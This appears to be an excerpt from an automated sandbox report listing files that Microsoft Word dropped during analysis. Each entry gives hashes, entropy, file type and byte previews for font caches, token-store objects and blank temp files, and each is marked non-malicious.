                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):521377
                                                  Entropy (8bit):4.9084889265453135
                                                  Encrypted:false
                                                  SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                  MD5:C37972CBD8748E2CA6DA205839B16444
                                                  SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                  SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                  SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                  Malicious:false
                                                  Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                  Category:dropped
                                                  Size (bytes):773040
                                                  Entropy (8bit):6.55939673749297
                                                  Encrypted:false
                                                  SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                  MD5:4296A064B917926682E7EED650D4A745
                                                  SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                  SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                  SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                  Malicious:false
                                                  Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2278
                                                  Entropy (8bit):3.8494266630663287
                                                  Encrypted:false
                                                  SSDEEP:48:uiTrlKxsxxUxl9Il8uLy8bUJ0gnLwClP9gmkPyGMbHd1rc:vIYtFW0gL79gHPyRbQ
                                                  MD5:CC2AB79405E70E5C229B75370FDFEA41
                                                  SHA1:E1BF16F53B2AC56AA456EEC15C1B9C139E0023E4
                                                  SHA-256:874409B4D3DAFFCF5D97A8A13D5E4DE4B2C2E429CAAC54FEE4F5958B22D55723
                                                  SHA-512:6F7B15E580EA4EFBD1373BDD0B8A843279F667E1F7F2AC4263FB77551EB2AC4939914E41CF424FFB21F0AD379CB7F1842C6A98A46A6A868B0403FA47CB8DD24D
                                                  Malicious:false
                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.N.h.2.H.T.1.T.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.n.k.K.g.i.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2684
                                                  Entropy (8bit):3.893838438972979
                                                  Encrypted:false
                                                  SSDEEP:48:uiTrlKxJxJxl9Il8uL5EnEbzfIh2WuYCSwPYvUoFZxlrUvMByGtKWMDd/vc:8Yt5O+zv4CzwdjrYHVe
                                                  MD5:C3C6CD81C677ABED5E0BA5BF49A0E4B5
                                                  SHA1:B4A01537066AA11E6DECC56C8B2008ABA40F18E8
                                                  SHA-256:84917154E80B5384DADAF4DF182F105EC2A3755A68DC6819A98E84C47920A22E
                                                  SHA-512:B98B2912C8C03FF81CAFC04448FFE369B35D6C5CD7B8D78A21B2184909AF21C9DD4D8779808AD7C6E203368681AD5CB2FF39AE8480721E953583C13894672C52
                                                  Malicious:false
                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.R.o.n.N.Q.Z.y.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.n.k.K.g.i.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4542
                                                  Entropy (8bit):3.989401879122802
                                                  Encrypted:false
                                                  SSDEEP:96:aYtYzRzSNULtfvaxNDdHnoUm71Z26H12B:a4YtzOUZfva7DdHng1U6V2B
                                                  MD5:40CEF6721CC5CA248256D7DFE5598FDB
                                                  SHA1:ED39CAB8AECD5E2B16D0FC3F331F4436781193D4
                                                  SHA-256:B5A8C77E611A081E13B8459258DF20EC7BB03CFF73CD0CD39F80C02EA41EA121
                                                  SHA-512:D6ADD2BC4FEBA56FEF3E54F02C1AE235C26F8DE38388B781CCE7F2B0A8DF810912DE77D5EE46224AE2108EB5C0BE74A80E7D523C978C3AF2639E60A5EF5BB531
                                                  Malicious:false
                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".8.p.n.6.A.j.V.T.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.C.n.k.K.g.i.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):13824
                                                  Entropy (8bit):4.404408472233551
                                                  Encrypted:false
                                                  SSDEEP:192:8tNQGXVV0rmEfpoy6BCcJW0XIZ50jSKWamwa:8tROfWCLp50jNm
                                                  MD5:EB820E1D0102A76FFDBC3022C8F7D673
                                                  SHA1:5E86F49DD7091341D686B82F19A3C20EDD94B3B7
                                                  SHA-256:0F191769969BD2E08E4C65207F4DA57F6126D312E92D07CA0D515BF0FFB60D1A
                                                  SHA-512:B7E4E15BA767F5141F75A9E5751BAB5C2E42E46C176798BDAE5B6604E1897C2AC813A85AA6C77723B6EE54AE6E9704CD8B15545B3C5F60A32F3714AFDC5626FF
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2048
                                                  Entropy (8bit):1.2631615108890057
                                                  Encrypted:false
                                                  SSDEEP:6:mEMEEE3DmlquAsl9lCgKxlqpVU+kpueNOMP2/7PgT/7Pox7Pk+lfO:tDmQuVYPjqpu+kpueM1/70/7gx7c+lG
                                                  MD5:EFCFEF7AD7530C82F3F5B0FE814019F6
                                                  SHA1:EE4A4FD4B0D39A6AA365E76C590784F0E58A9FA7
                                                  SHA-256:AF28FA27CE23EE84423BD3C3ACF3BDE6E5C936F3C8824559F70DC6FD5DCF4593
                                                  SHA-512:9680E14664F7709EA88C7FB9D015297BF386CFA5F71D09EE230A55C2F2B82F0532528115897E14333A139492A06DA974EA85FEFAE1E0E5DD41FFF9F6955455CA
                                                  Malicious:false
                                                  Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...j.o.n.e.s...j............................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...\...h...l...................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.288511995009958
                                                  Encrypted:false
                                                  SSDEEP:3:QlHl3lldHzlblXllZrnlPlXllXa:wA
                                                  MD5:2AB4EFC5E58B2C45C502D4884BF74679
                                                  SHA1:2EF9FB1452ECB08DD858E43F931607DA241E29C5
                                                  SHA-256:A9DE0B40497AEF1418780367599DC605E4F75BF64746FECFC0E0A7A4413A15C7
                                                  SHA-512:C3824EEEDFB90DE361498CE8E119A4AD156BD551DEEEAB29578A0FFC1E78B0AF733F1DFEA5E8F5CE5AD92602869778A28FDA312553E60D0A0648C8F7B8F3CDBD
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05194905805374581
                                                  Encrypted:false
                                                  SSDEEP:3:1lvlxlln:vz
                                                  MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                                                  SHA1:D15075354757A59DE6E057435511D956663955FB
                                                  SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                                                  SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.03351732319703582
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lG:40
                                                  MD5:830FBF83999E052538EAF156AB6ECB17
                                                  SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                  SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                  SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                  Malicious:false
